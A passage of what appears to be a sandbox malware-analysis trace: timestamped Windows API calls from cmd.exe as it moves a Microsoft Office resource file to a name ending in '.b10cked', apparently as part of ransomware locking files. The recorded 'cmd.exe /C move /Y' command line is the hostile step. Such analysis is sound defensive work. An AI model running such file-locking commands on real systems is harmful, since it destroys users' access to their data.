lpAddress=0x110000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0158.721] GetConsoleOutputCP () returned 0x1b5 [0158.721] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.721] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.721] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.721] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.721] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.722] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.722] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.722] GetEnvironmentStringsW () returned 0x320210* [0158.722] FreeEnvironmentStringsW 
(penv=0x320210) returned 1 [0158.722] GetEnvironmentStringsW () returned 0x320210* [0158.722] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0158.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee4c | out: phkResult=0x20ee4c*=0x40) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0xa0, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x0, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.722] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x40, 
lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.722] RegCloseKey (hKey=0x40) returned 0x0 [0158.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee4c | out: phkResult=0x20ee4c*=0x40) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x40, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x1, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x0, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x4, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x4) returned 0x0 [0158.723] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee54, lpData=0x20ee58, lpcbData=0x20ee50*=0x1000 | out: lpType=0x20ee54*=0x0, lpData=0x20ee58*=0x9, lpcbData=0x20ee50*=0x1000) returned 0x2 [0158.723] RegCloseKey (hKey=0x40) 
returned 0x0 [0158.723] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0158.723] srand (_Seed=0x5b886381) [0158.723] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" [0158.723] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" [0158.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.723] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.724] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.724] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.724] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.724] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.724] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.724] _wcsicmp 
(_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.724] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.724] GetEnvironmentStringsW () returned 0x322360* [0158.724] FreeEnvironmentStringsW (penv=0x322360) returned 1 [0158.724] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.724] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.724] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.724] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.724] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.724] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.724] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.724] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.724] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fc18, lpFilePart=0x20fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fc14*="Desktop") returned 0x18 [0158.724] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.724] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0158.725] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 
| out: hFindFile=0x3209f0) returned 1 [0158.725] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f994 | out: lpFindFileData=0x20f994) returned 0x3209f0 [0158.725] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0158.725] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.725] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.725] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.725] GetEnvironmentStringsW () returned 0x320210* [0158.725] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0158.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.726] GetConsoleOutputCP () returned 0x1b5 [0158.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.726] GetUserDefaultLCID () returned 0x409 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd58, cchData=128 | out: lpLCData="0") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd58, cchData=128 | out: lpLCData="0") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fd58, cchData=128 | out: lpLCData="1") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.727] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.728] GetConsoleTitleW (in: lpConsoleTitle=0x310930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.728] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.728] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.729] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.729] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.729] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.729] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.729] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.729] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.729] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.732] GetConsoleTitleW (in: lpConsoleTitle=0x20fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0158.732] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.732] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.732] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.732] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.732] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.733] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.733] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.733] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.733] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.733] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.733] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.733] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.733] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.733] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.733] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0158.733] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.733] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.733] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.733] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.733] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.734] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f80c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f804, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f804*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.735] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.736] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 
69 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgresd~1.trx")) returned 0x2020 [0158.736] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.736] SetErrorMode (uMode=0x0) returned 0x0 [0158.736] SetErrorMode (uMode=0x1) returned 0x0 [0158.736] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f194, lpFilePart=0x20f17c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", lpFilePart=0x20f17c*="SGRESD~1.TRX") returned 0x3c [0158.736] SetErrorMode (uMode=0x0) returned 0x1 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgresd~1.trx")) returned 0x2020 [0158.737] SetErrorMode (uMode=0x0) returned 0x0 [0158.737] SetErrorMode (uMode=0x1) returned 0x0 [0158.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f610, lpFilePart=0x20f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", lpFilePart=0x20f3a8*="SGRESD~1.TRX") returned 0x3c [0158.737] SetErrorMode (uMode=0x0) returned 0x1 [0158.737] SetErrorMode (uMode=0x0) returned 0x0 [0158.737] SetErrorMode (uMode=0x1) returned 0x0 [0158.737] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f818, lpFilePart=0x20f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x20f3a8*="SGRES.DLL.trx_dll.b10cked") returned 0x49 [0158.737] SetErrorMode (uMode=0x0) returned 0x1 [0158.737] SetLastError (dwErrCode=0x0) [0158.737] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll.b10cked")) returned 0xffffffff [0158.737] GetLastError () returned 0x2 [0158.737] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20ed24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed24) returned 0x322128 [0158.737] FindNextFileW (in: hFindFile=0x322128, lpFindFileData=0x20ed24 | out: lpFindFileData=0x20ed24) returned 0 [0158.738] GetLastError () returned 0x12 [0158.738] FindClose (in: hFindFile=0x322128 | out: hFindFile=0x322128) returned 1 [0158.739] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x321cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321cb8) returned 0x322128 [0158.864] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0158.864] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20efbc, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0158.864] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll")) returned 0x2020 [0158.864] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.865] FindClose (in: hFindFile=0x322128 | out: hFindFile=0x322128) returned 1 [0158.865] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ef70 | out: _Buffer=" 1") returned 9 [0158.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.865] GetFileType (hFile=0x7) returned 0x2 [0158.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.865] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eefc | out: lpMode=0x20eefc) 